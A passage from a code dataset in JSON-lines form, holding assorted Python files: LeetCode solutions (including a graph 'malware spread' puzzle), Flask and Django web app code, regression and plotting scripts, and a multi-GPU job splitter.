'''\n n = len(graph)\n left = [i for i in range(n)]\n forest = []\n tree = []\n\n def dfs(v:int):\n inx = left.index(v)\n left.pop(inx)\n tree.append(v)\n for i in range(n):\n if v != i and graph[v][i] == 1:\n if i in left:\n dfs(i)\n \n def infect(v:int, w:int, infected):\n if v not in infected:\n infected.append(v)\n for i in range(n):\n if i not in (v, w) and graph[v][i] == 1:\n if i not in infected:\n infect(i, w, infected)\n\n\n while left:\n dfs(left[0])\n forest.append(set(tree))\n tree = []\n \n iset = set(initial)\n intes = SortedDict()\n for tree in forest:\n sub = tree - iset\n if len(tree) - len(sub) > 0:\n vset = tree - sub\n if len(vset) == 1:\n if len(tree) in intes.keys():\n intes[len(tree)].extend(vset)\n else:\n intes[len(tree)] = list(vset)\n else:\n for i in vset:\n infected = []\n for left in vset:\n if left != i:\n infect(left, i, infected)\n val = len(tree) - len(infected)\n if val in intes.keys():\n intes[val].append(i)\n else:\n intes[val] = [i]\n maxkey = max(intes.keys())\n return min(intes[maxkey])\n \nif __name__ == \"__main__\":\n sol = Solution()\n graph, initial = [[1,1,0],[1,1,0],[0,0,1]], [0,1]\n graph, initial = [[1,1,0],[1,1,1],[0,1,1]], [0,1]\n graph, initial = [[1,1,0,0],[1,1,1,0],[0,1,1,1],[0,0,1,1]], [0,1]\n print(sol.minMalwareSpread(graph, initial))","repo_name":"David-5-5/tutorial","sub_path":"python/algo/leecode/algo928.py","file_name":"algo928.py","file_ext":"py","file_size_in_byte":2947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22867900986","text":"class Solution:\n def longestCommonSubsequence(self, text1: str, text2: str) -> int:\n if not text1 or not text2:\n return 0\n if text1 == text2:\n return len(text1)\n len_1 = len(text1)\n len_2 = len(text2)\n matrix = [[0 for _ in range(len_2)] for j in range(len_1)]\n for k in range(len_2):\n if text1[:0 + 1] in text2[:k + 1]:\n matrix[0][k] += 1\n i = 0\n for i in range(1, len_1):\n for j in range(len_2):\n\n if text1[:i + 1][-1] == text2[:j + 1][-1]:\n try:\n lst = matrix[i-1][:j] + [0]\n except:\n lst = 0\n matrix[i][j] += (1 + max(lst))\n else:\n lst = []\n if 0 <= i - 1 < len_1:\n lst.append(matrix[i - 1][j])\n if 0 <= j - 1 < len_1:\n lst.append(matrix[i][j - 1])\n matrix[i][j] = max(lst)\n return max(matrix[i])\n\n\n\n\"\"\"TESTS\n1)Runtime 1351 ms\nBeats 35.25%\nMemory 22.8 MB\nBeats 43.63%\n2)Runtime 1343 ms\nBeats 35.73%\nMemory 22.8 MB\nBeats 43.63%\"\"\"","repo_name":"BenitoSwaggolini/Leetcode_tasks","sub_path":"medium/1143. Longest Common Subsequence/r.py","file_name":"r.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"37240993312","text":"# How to get deeply located item\n\ndata = [3, 5, 7, [9, 11]]\n# We need to print \"11\"\n\nelement = data[3][1]\nprint(element)\n\n# [3] gets the fourth item in data,\n# which is a list [9, 11]\n\n# [1] gets the second item in that\n# list [9, 11], that is \"11\"","repo_name":"ash/amazing_python3","sub_path":"307-deep-index-list.py","file_name":"307-deep-index-list.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"48"} +{"seq_id":"2136210802","text":"from flask import render_template, request, url_for, session\nfrom sqlalchemy.sql import and_\nfrom Ostrich import app\nfrom Ostrich import models\n\n\n@app.route('/')\ndef index():\n feed=models.User.query.all()\n return render_template(\"index.html\", name=\"___\", feed=feed)\n\n@app.route('/posted', methods=[\"GET\",\"POST\"])\ndef posted():\n name = request.form['name']\n location = request.form['location']\n course = request.form['course']\n shirt = request.form['shirt']\n new_post = models.User(name, location, course, shirt)\n models.db.session.add(new_post)\n models.db.session.commit()\n feed=models.User.query.all()\n session['idNum'] = new_post.id\n return render_template(\"logged_in.html\", name=name, feed=feed)\n\n\n@app.route('/logged_out')\ndef logged_out():\n idNum = session.get('idNum', None)\n user = models.User.query.filter_by(id=idNum).first()\n models.db.session.delete(user)\n models.db.session.commit()\n feed = models.User.query.all()\n return render_template(\"index.html\", feed=feed, idNum=idNum)\n\n@app.route('/filterLocation', methods=[\"GET\", \"POST\"])\ndef filterLocation():\n location = request.form['location']\n filteredFeed = models.User.query.filter_by(location=location).all()\n return render_template(\"index.html\", feed=filteredFeed)\n\n@app.route('/filterCourse', methods=[\"GET\", \"POST\"])\ndef filterCourse():\n course = request.form['course']\n filteredFeed = models.User.query.filter_by(course=course).all()\n return render_template(\"index.html\", feed=filteredFeed)\n\n\n","repo_name":"leonliang0395/SturdyBirdy","sub_path":"Ostrich/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70274053265","text":"from entities.purchase import Purchase\nfrom db_connection import get_database_connection\n\n\ndef get_purchase_by_row(row):\n return Purchase(\n row['budget_id'],\n row['category'],\n row['amount'],\n row['username'],\n row['comment'],\n row['p_id']\n ) if row else None\n\n\nclass PurchaseRepository:\n '''Class of the purchase-repository\n '''\n\n def __init__(self, connection):\n '''class constructor\n\n Args:\n connection: database connection object\n\n '''\n self._connection = connection\n\n def fetch_all(self):\n '''Returns all purchases\n Returns:\n list of Purchase-objects\n '''\n cursor = self._connection.cursor()\n cursor.execute('select * from purchases')\n rows = cursor.fetchall()\n\n return list(map(get_purchase_by_row, rows))\n\n def find_by_username(self, username):\n '''Finds purchase based on username\n\n Args:\n username: the user the search is based on\n\n Returns:\n The list of purchases as Purchase-objects if in existance, otherwhise None\n\n '''\n\n all_purchases = self.fetch_all()\n new = filter(\n lambda purchase: purchase and purchase.username == username,\n all_purchases\n )\n return list(new)\n\n def find_by_category(self, category, username):\n '''Finds purchase based on category and username\n Args:\n category:\n username:\n Returns:\n Purchase-objects in list\n '''\n\n user_purchases = self.find_by_username(username)\n categorized = filter(\n lambda purchase: purchase and purchase.category == category,\n user_purchases\n )\n return list(categorized)\n\n def find_by_id(self, p_id):\n '''Finds a specific purchase based on id\n\n Args:\n p_id: string, the purchase id\n\n Returns:\n Purchase object\n '''\n\n cursor = self._connection.cursor()\n cursor.execute('select * from purchases where p_id=?', (p_id,))\n rows = cursor.fetchall()\n\n return list(map(get_purchase_by_row, rows))[0]\n\n def add_purchase(self, purchase):\n '''Saves a purchase in the purchase-database\n Args:\n purchase: Purchase-object that will be saved\n\n '''\n\n cursor = self._connection.cursor()\n\n cursor.execute(\n '''insert into purchases\n (p_id,category,amount,username,comment,budget_id) values (?,?,?,?,?,?)''',\n (purchase.id,\n purchase.category,\n purchase.amount,\n purchase.username,\n purchase.comment,\n purchase.budget_id)\n )\n self._connection.commit()\n\n return purchase\n\n def delete_one(self, p_id):\n '''Deletes specific purchase\n\n Args:\n p_id: id of the deleted purchase\n\n '''\n\n cursor = self._connection.cursor()\n cursor.execute('delete from purchases where p_id = ?', (p_id,))\n self._connection.commit()\n\n def delete_all(self):\n '''Deletes all purchases\n '''\n\n cursor = self._connection.cursor()\n cursor.execute('delete from purchases')\n self._connection.commit()\n\n\npurchase_repository = PurchaseRepository(get_database_connection())\n","repo_name":"NaND3R5/ot-harjoitustyo","sub_path":"budgetapp/src/databases/purchase_repository.py","file_name":"purchase_repository.py","file_ext":"py","file_size_in_byte":3429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41132519475","text":"#!/usr/bin/python3\n\"\"\" Module that implements the url resources for our flask app \"\"\"\nimport os\nfrom flask import request\nfrom flasgger.utils import swag_from\nfrom flask_restful import Resource\nfrom models.auth_module import authenticate\n\nfrom models.api_users import APIUsers\nfrom models.text_query import TextQuery\nfrom models.image_query import ImageQuery\nfrom analysis_engines.text_engine import TextEngine\nfrom analysis_engines.image_engine import ImageEngine\nfrom models.base_query import BaseClass\n\nuser_key = BaseClass()\n\n\nclass TextAnalysisResource(Resource):\n \"\"\" This Class implements the TextAnalysis URL resource \"\"\"\n \n @authenticate\n @swag_from(os.path.join(os.path.dirname(__file__), 'swagger.yml'))\n def post(self):\n \"\"\"Function that implements the post endpoint for sentiment analysis\n \"\"\"\n \n # Extract the API KEY from the headers use it to find username\n api_key = request.headers.get('Api-Key')\n user = user_key.get_key(api_key)\n\n \n if not user:\n return {'message': 'Invalid Api-Key provided (there is no user associated with the key)'}, 401\n \n # Extract Text submitted for analysis from request body\n payload = request.get_json()\n text_input = payload.get('text-input')\n \n # Analysing the text and Extract sentiment for saving to database\n query_analysis_object = TextEngine()\n analysis = query_analysis_object.analyze_text(text_input=text_input)\n sentiment_value = analysis['messages'][0]['sentiment']\n \n # create a new instance of TextQuery class to save the request to database\n query_object = TextQuery(api_key, text_input, sentiment_value)\n query_object.save_query()\n return analysis\n \n\nclass ImageAnalysisResource(Resource):\n \"\"\" This Class implements the ImageAnalysis URL resource \"\"\"\n \n @authenticate\n def post(self):\n \"\"\" Implements the post endpoint for image analysis \"\"\"\n \n # Check if the 'image' file was uploaded in the request\n if 'image' not in request.files:\n return {'message': 'No image file uploaded.', 'required':'image file'}, 400\n\n image_file = request.files['image']\n \n api_key = request.headers.get('Api-Key')\n user = user_key.get_key(api_key)\n\n if not user:\n username = 'default'\n else:\n username = api_key\n \n # Save the image to the specific user folder\n folder_path = os.path.join(os.getcwd(), 'images', username)\n file_path = os.path.join(folder_path, image_file.filename)\n os.makedirs(folder_path, exist_ok=True)\n image_file.save(file_path)\n \n \n # Analysing the image file\n analysis = ImageEngine().analyze_file(file_path)\n \n # Create an ImageQuery object for storage\n query_object = ImageQuery(file_path, username, analysis)\n query_object.save_to_pickle(api_key)\n \n return analysis","repo_name":"AtangfMokamogo/NullExplicit_API","sub_path":"models/url_resources.py","file_name":"url_resources.py","file_ext":"py","file_size_in_byte":3042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27211898676","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 7 09:39:47 2017\n# Polynomial Regression\n@author: Atul\n\"\"\"\n\n# import\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nfrom sklearn.preprocessing import PolynomialFeatures\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LinearRegression\nimport statsmodels.formula.api as sm\n\n\n# data processing\ndata = pd.read_csv('dataset/Position_Salaries.csv')\nX = data.iloc[:, 1:2].values\ny = data.iloc[:, 2].values\n\n\"\"\"\n# Encoding the State columns\n# this will encode the categorical value to numerical as 0,1,2....\nlb_X = LabelEncoder()\nX[:, 0] = lb_X.fit_transform(X[:, 0])\n# this will create binary like representation from categorical value\n# set 1 for true and 0 for false\nohe_X = OneHotEncoder(categorical_features=[0])\nX = ohe_X.fit_transform(X).toarray()\n\n\n# Avoiding the dummy variable trap\nX = X[:, 1:] # removing the first column\n\n# splitting the data\ntrain_X, test_X, train_y, test_y = train_test_split(X, y, test_size=0.2, random_state=0)\n\"\"\"\n\n#fitting the data\nclf = LinearRegression()\nclf.fit(X, y)\n\n# polynomial, degree = 2\npoly = PolynomialFeatures(degree=2)\nX_poly = poly.fit_transform(X)\n\nclf_poly = LinearRegression()\nclf_poly.fit(X_poly, y)\n\n\n# polynomial, degree = 4\npoly4 = PolynomialFeatures(degree=4)\nX_poly4 = poly4.fit_transform(X)\n\nclf_poly4 = LinearRegression()\nclf_poly4.fit(X_poly4, y)\n\n\n\n# visualizting the data (Linear Regressions)\nplt.scatter(X, y, c='blue')\nplt.plot(X, clf.predict(X), c='red')\nplt.xlabel(\"Positions\")\nplt.ylabel(\"Salary\")\n\n\n# visualizting the data (Linear Regressions)\nplt.scatter(X, y, c='blue')\nplt.plot(X, clf_poly.predict(X_poly), c='red')\nplt.xlabel(\"Positions\")\nplt.ylabel(\"Salary\")\n\n\n# visualizting the data (Linear Regressions)\n#X_grid = np.arange(min(X), max(X), 0.1)\nplt.scatter(X, y, c='blue')\nplt.plot(X, clf_poly4.predict(X_poly4), c='red')\nplt.xlabel(\"Positions\")\nplt.ylabel(\"Salary\")\n\n# more smoother prediction\nX_grid = np.arange(min(X), max(X), 0.1)\nX_grid = X_grid.reshape(len(X_grid), 1)\nplt.scatter(X, y, c='blue')\nplt.plot(X_grid, clf_poly4.predict(poly4.fit_transform(X_grid)), c='green')\nplt.grid(True)\nplt.xlabel(\"Positions\")\nplt.ylabel(\"Salary\")\n\n\n\n","repo_name":"atulsingh0/MachineLearning","sub_path":"ML_A2Z/04_Polynomial_Regression.py","file_name":"04_Polynomial_Regression.py","file_ext":"py","file_size_in_byte":2285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73041914064","text":"import os\nimport subprocess as sp\nimport sys\n\n# convenience method to fetch gpu indices via `nvidia-smi`\ndef get_gpus(args: dict) -> list[str]:\n proc = sp.Popen(['nvidia-smi', '--list-gpus'], stdout=sp.PIPE, stderr=sp.PIPE)\n out, err = proc.communicate()\n data = [line.decode() for line in out.splitlines(False)]\n gpus = [f\"{item[4:item.index(':')]}\" for item in data]\n if args.gpus and args.gpus != \"all\":\n gpus = [id for id in gpus if id in args.gpus]\n\n return gpus\n\n# this splits the work into subprocesses, one for each gpu\n# args must have a --batch flag, which is used to determine which gpu to use\n# args must have a --gpus flag, which is used to determine which gpus to use\n# it will run the calling script again, but with a --batch flag per gpu\ndef split_across_gpus(args, n_elements, run_fn, final_fn=None):\n if args.batch != None:\n print(\"Starting process on CUDA device: \" + os.environ['CUDA_VISIBLE_DEVICES'])\n\n [proc_idx, n_procs] = [int(s) for s in args.batch.split('/')]\n run_fn(proc_idx, n_procs)\n \n # No --batch flag means we are part of the main process\n else:\n\n # split into subprocesses, one for each gpu\n procs = []\n gpus = get_gpus(args)\n n_gpus = len(gpus)\n\n # In case there are less elements to process than the number of gpus available...\n if n_elements < n_gpus:\n gpus = gpus[0:n_elements]\n n_gpus = n_elements\n\n print(f\"Using {n_gpus} GPU(s). Processing...\")\n \n i = 0\n for gpu in gpus:\n env = os.environ.copy()\n env[\"CUDA_VISIBLE_DEVICES\"] = gpu\n \n # rerun this command, but with a batch arg\n cmd = sys.argv.copy()\n cmd.insert(0, 'python')\n cmd.extend([\"--batch\", f\"{i}/{n_gpus}\"])\n\n proc = sp.Popen(cmd, env=env, shell=True, stderr=sys.stderr, stdout=sys.stdout)\n procs.append(proc)\n\n i = i + 1\n \n for p in procs:\n p.wait()\n \n if final_fn:\n final_fn()\n","repo_name":"JamesPerlman/nerf_utils","sub_path":"nerf/multi_gpu.py","file_name":"multi_gpu.py","file_ext":"py","file_size_in_byte":2096,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"48"} +{"seq_id":"38408399513","text":"# PascaleCase-------- all first are capital\n# EmployeeName\n# camelCase ----------first small all other are capital\n# isNumeric\n# isFloat\nclass Number:\n def sum(self):\n print( self.a+self.b)\n \nnum=Number()\nnum.a=12\nnum.b=13\ns=num.sum()\n","repo_name":"itsmesangram5/Python_Tutorials","sub_path":"CodeWithHarry__PYTHON/26Oops.py","file_name":"26Oops.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20617207569","text":"import os\nimport subprocess\n\ncwd = os.getcwd()\nbuildPath = cwd + \"/build_GL\"\n\nexist = os.path.isdir(buildPath)\n\nif not exist:\n os.mkdir(buildPath)\n\nos.chdir(buildPath)\n\n#for some reason, CMake cannot find glfw3 header file. Maybe I can use SDL2......\nsubprocess.call(\"cmake -DCMAKE_TOOLCHAIN_FILE=E:/vcpkg/scripts/buildsystems/vcpkg.cmake -DFORCEGL=ON ..\")","repo_name":"Visin1991/VEngine","sub_path":"Build_GL.py","file_name":"Build_GL.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32366468525","text":"\"\"\"A ECI (Editio Chronica Incredibilis ou Editora de Crônicas Incríveis) é muito tradicional quando se trata\nde numerar as páginas de seus livros. Ela sempre usa a numeração romana para isso. E seus livros nunca ultrapassam\nas 999 páginas pois, quando necessário, dividem o livro em volumes.\n\nVocê deve escrever um programa que, dado um número arábico, mostra seu equivalente na numeração romana.\n\nLembre que I representa 1, V é 5, X é 10, L é 50, C é 100, D é 500 e M representa 1000.\n\nEntrada\nA entrada é um número inteiro positivo N (0 < N < 1000).\n\nSaída\nA saída é o número N escrito na numeração romana em uma única linha. Use sempre letras maiúsculas.\"\"\"\nN = int(input())\nM = N // 1000\nN = N % 1000\nF = str()\nif M == 1:\n F += 'M'\nM = N // 100\nN = N % 100\nif M == 9:\n F += 'CM'\nelif M >= 5:\n F += 'D'\n for c in range(5,M):\n F += 'C'\nelif M == 4:\n F += 'CD'\nelif M < 4:\n for c in range(M):\n F += 'C'\nM = N // 10\nN = N % 10\nif M == 9:\n F += 'XC'\nelif M >= 5:\n F += 'L'\n for c in range(5,M):\n F += 'X'\nelif M == 4:\n F += 'XL'\nelif M < 4:\n for c in range(M):\n F += 'X'\nif N == 9:\n F += 'IX'\nelif N >= 5:\n F += 'V'\n for c in range(5,N):\n F += 'I'\nelif N == 4:\n F += 'IV'\nelif N < 4:\n for c in range(N):\n F += 'I'\nprint(F)\n\n","repo_name":"marcelopd20/PythonStudies","sub_path":"PlataformasDeCódigo/URI/1960 - Numeração Romana para Números de Página.py","file_name":"1960 - Numeração Romana para Números de Página.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6805526314","text":"\"\"\" Laura Day - Milestone Project 4.\n\nThis project was mainly made with guidance from\nBoutique Ado Project\n\n(c) Josefine Kihlström 2021\n\"\"\"\nimport os\nimport dj_database_url\nfrom pathlib import Path\n\n# Build paths inside the project like this: BASE_DIR / 'subdir'.\nBASE_DIR = Path(__file__).resolve().parent.parent\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = os.environ.get('SECRET_KEY', '')\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = False\n\nALLOWED_HOSTS = ['lauraday-josefinekihlstrom.herokuapp.com', 'localhost']\n\n\n# Application definition\n\nINSTALLED_APPS = [\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.sites',\n 'allauth',\n 'allauth.account',\n 'allauth.socialaccount', # social media login. Keep?\n 'home',\n 'products',\n 'bag',\n 'checkout',\n 'crispy_forms',\n 'profiles',\n 'storages',\n 'blog',\n]\n\nMIDDLEWARE = [\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'whitenoise.middleware.WhiteNoiseMiddleware',\n]\n\nROOT_URLCONF = 'lauraday.urls'\n\nCRISPY_TEMPLATE_PACK = 'bootstrap4'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [\n os.path.join(BASE_DIR, 'templates'),\n os.path.join(BASE_DIR, 'templates', 'allauth'),\n ],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n # above is required by allauth\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n 'django.template.context_processors.media',\n 'bag.contexts.bag_contents',\n ],\n 'builtins': [\n 'crispy_forms.templatetags.crispy_forms_tags',\n 'crispy_forms.templatetags.crispy_forms_field',\n ]\n },\n },\n]\n\nMESSAGE_STORAGE = 'django.contrib.messages.storage.session.SessionStorage'\n\n\n# following code is from django allauth installation\n# https://django-allauth.readthedocs.io/en/latest/installation.html\nAUTHENTICATION_BACKENDS = [\n # Handles superuser/admin login.\n 'django.contrib.auth.backends.ModelBackend',\n\n # Allows user to login with email address.\n 'allauth.account.auth_backends.AuthenticationBackend',\n]\n\nSITE_ID = 1\n\n\n# Allow authentication by username or email.\nACCOUNT_AUTHENTICATION_METHOD = 'username_email'\n# Email required to register.\nACCOUNT_EMAIL_REQUIRED = True\nACCOUNT_EMAIL_VERIFICATION = 'mandatory'\nACCOUNT_SIGNUP_EMAIL_ENTER_TWICE = True\nACCOUNT_USERNAME_MIN_LENGTH = 4\n# Specified login url.\nLOGIN_URL = '/accounts/login/'\n# Redirecting back after logging in.\nLOGIN_REDIRECT_URL = '/'\n\nWSGI_APPLICATION = 'lauraday.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/3.1/ref/settings/#databases\n\nif 'DATABASE_URL' in os.environ:\n DATABASES = {\n 'default': dj_database_url.parse(os.environ.get('DATABASE_URL'))\n }\nelse:\n DATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': BASE_DIR / 'db.sqlite3',\n }\n }\n\n\n# Password validation\n# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\n\n# Internationalization\n# https://docs.djangoproject.com/en/3.1/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images) \n# https://docs.djangoproject.com/en/3.1/howto/static-files/\n\nSTATIC_URL = '/static/'\nSTATICFILES_DIRS = (os.path.join(BASE_DIR, 'static'),)\nSTATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')\n\nMEDIA_URL = '/media/'\nMEDIA_ROOT = os.path.join(BASE_DIR, 'media')\n\nif 'USE_AWS' in os.environ:\n # Cache control\n AWS_S3_OBJECT_PARAMETERS = {\n 'Expires': 'Thu, 31 Dec 2099 20:00:00 GMT',\n 'CacheControl': 'max-age=94608000',\n }\n\n # Bucket configuration\n AWS_STORAGE_BUCKET_NAME = 'lauraday-josefinekihlstrom'\n AWS_S3_REGION_NAME = 'eu-north-1'\n AWS_ACCESS_KEY_ID = os.environ.get('AWS_ACCESS_KEY_ID')\n AWS_SECRET_ACCESS_KEY = os.environ.get('AWS_SECRET_ACCESS_KEY')\n AWS_S3_CUSTOM_DOMAIN = f'{AWS_STORAGE_BUCKET_NAME}.s3.amazonaws.com'\n\n # Static and media files\n STATICFILES_STORAGE = 'custom_storages.StaticStorage'\n STATICFILES_LOCATION = 'static'\n DEFAULT_FILE_STORAGE = 'custom_storages.MediaStorage'\n MEDIAFILES_LOCATION = 'media'\n\n # Override static and media URLs in production\n STATIC_URL = 'https://%s/%s/' % (AWS_S3_CUSTOM_DOMAIN, STATICFILES_LOCATION)\n MEDIA_URL = 'https://%s/%s/' % (AWS_S3_CUSTOM_DOMAIN, MEDIAFILES_LOCATION)\n\n\n# Stripe\nFREE_DELIVERY_THRESHOLD = 50\nSTANDARD_DELIVERY_PERCENTAGE = 10\nSTRIPE_CURRENCY = 'usd'\nSTRIPE_PUBLIC_KEY = os.getenv('STRIPE_PUBLIC_KEY', '')\nSTRIPE_SECRET_KEY = os.getenv('STRIPE_SECRET_KEY', '')\nSTRIPE_WH_SECRET = os.getenv('STRIPE_WH_SECRET', '')\nif 'DEVELOPMENT' in os.environ:\n EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'\n DEFAULT_FROM_EMAIL = 'info@lauraday.com'\nelse:\n EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'\n EMAIL_USE_TLS = True\n EMAIL_PORT = 587\n EMAIL_HOST = 'smtp.gmail.com'\n EMAIL_HOST_USER = os.environ.get('EMAIL_HOST_USER')\n EMAIL_HOST_PASSWORD = os.environ.get('EMAIL_HOST_PASS')\n DEFAULT_FROM_EMAIL = os.environ.get('EMAIL_HOST_USER')\n","repo_name":"Josefinekihlstrom/LauraDay","sub_path":"lauraday/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":6563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26401821237","text":"import numpy as np\nimport pylab\nfrom Bio import SeqIO\nfrom bidi.algorithm import get_display\nfrom arabic_reshaper import reshape\n\n\ndef en_to_fa(num, formatter='%1.1f%%'):\n num_as_string = formatter % num\n mapping = dict(list(zip('0123456789.%', '۰۱۲۳۴۵۶۷۸۹%')))\n return ''.join(mapping[digit] for digit in num_as_string)\n\n\ndef draw_line_plot(fasta_input_file, plot_title, plot_out_file, x_text, y_text):\n len_of_records = [len(rec.seq) for rec in SeqIO.parse(fasta_input_file, \"fasta\")]\n length, count = np.unique(len_of_records, return_counts=True)\n max_len = max(length)\n min_len = min(length)\n print(length)\n print(count)\n print(\"max_len: \" + str(max_len))\n print(\"min_len: \" + str(min_len))\n font = {\"family\": \"Sahel\", \"size\": 12}\n\n pylab.xlabel(get_display(reshape('طول توالی پپتیدها')))\n pylab.ylabel(get_display(reshape('تعداد پپتیدها')))\n pylab.title(plot_title)\n pylab.text(x_text, y_text,\n get_display(reshape('=ماکزیمم طول ')) + str(max_len) + get_display(reshape('\\n=مینیمم طول ')) +\n str(min_len) + get_display(reshape('\\n=تعداد کل توالی ها'))\n + str(sum(count)))\n pylab.grid()\n pylab.plot(length, count)\n pylab.savefig(plot_out_file)\n\n pylab.cla()\n pylab.clf()\n\n\ndef draw_all_plots():\n title_pos = 'نمودار طول توالی پپتیدهای ضدسرطانی پس از اعمال cd-hit 80%'\n title_neg = 'نمودار طول توالی پپتیدهای غیرضدسرطانی پس از اعمال cd-hit 80%'\n draw_line_plot('../../../data/split_data/round3/raw_data_after_split_pos_and_neg/ACP_80_pos.fasta',\n get_display(reshape(title_pos)),\n 'ACP_80_pos_farsi', 150, 30)\n draw_line_plot('../../../data/split_data/round3/raw_data_after_split_pos_and_neg/ACP_80_neg.fasta',\n get_display(reshape(title_neg)),\n 'ACP_80_neg_farsi', 60, 120)\n # # -----------------------------\n # title_pos = 'نمودار طول توالی پپتیدهای ضدسرطانی پس از اعمال cd-hit 90%'\n # title_neg = 'نمودار طول توالی پپتیدهای غیرضدسرطانی پس از اعمال cd-hit 90%'\n # draw_line_plot('../../../data/split_data/round3/raw_data_after_split_pos_and_neg/ACP_90_pos.fasta',\n # get_display(reshape(title_pos)),\n # 'ACP_90_pos_farsi', 150, 35)\n # draw_line_plot('../../../data/split_data/round3/raw_data_after_split_pos_and_neg/ACP_90_neg.fasta',\n # get_display(reshape(title_neg)),\n # 'ACP_90_neg_farsi', 70, 120)\n # -----------------------------\n # title_pos = 'نمودار طول توالی پپتیدهای ضدسرطانی ��دون اعمال cd-hit'\n # title_neg = 'نمودار طول توالی پپتیدهای غیرضدسرطانی بدون اعمال cd-hit'\n #\n # draw_line_plot('../../../data/ACP_dataset/fasta/ACP_mixed_all_pos.fasta',\n # get_display(reshape(title_pos)),\n # 'Original_ACP_pos_farsi', 150, 65)\n #\n # draw_line_plot('../../../data/ACP_dataset/fasta/ACP_mixed_all_neg.fasta',\n # get_display(reshape(title_neg)),\n # 'Original_ACP_neg_farsi', 70, 150)\n # -----------------------------\n\n\ndraw_all_plots()\n\nprint(\"DONE!\")\n","repo_name":"mtzynb/MyThesis","sub_path":"plots/round3/plots_raw_data/plot_data_farsi.py","file_name":"plot_data_farsi.py","file_ext":"py","file_size_in_byte":3445,"program_lang":"python","lang":"fa","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27165700616","text":"import glob\nfrom pathlib import Path\nfrom time import sleep\n\nimage_list = glob.glob(\"image/*.png\")\n\ntext = \"\"\ntext = text + \"\\n\" + \" \"\nfor i in image_list:\n text = text + \"\\n\" + f\" image/{Path(i).name}\"\ntext = text + \"\\n\" + \" \"\ntext = text + \"\\n\" + \"\"\n\nfile_path = \"resource.qrc\"\nwith open(file_path, 'w', encoding=\"utf-8\") as file:\n file.write(text)\n\nprint(\"OK\")\nsleep(1)","repo_name":"MKdays/__resource__","sub_path":"image_to_qrc.py","file_name":"image_to_qrc.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24652968779","text":"import os\n\nimport cv2\nimport insightface\nfrom PIL import Image\nfrom flask import Flask, render_template, request, redirect, url_for, send_from_directory\nfrom insightface.app import FaceAnalysis\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef home():\n return render_template('home.html')\n\n\n@app.route('/uploads/')\ndef uploaded_file(filename):\n return send_from_directory('uploads', filename)\n\n\n@app.route('/faces/')\ndef uploaded_faces(filename):\n return send_from_directory('faces', filename)\n\n\n@app.route('/face_detect_and_select', methods=['GET', 'POST'])\ndef display_faces():\n 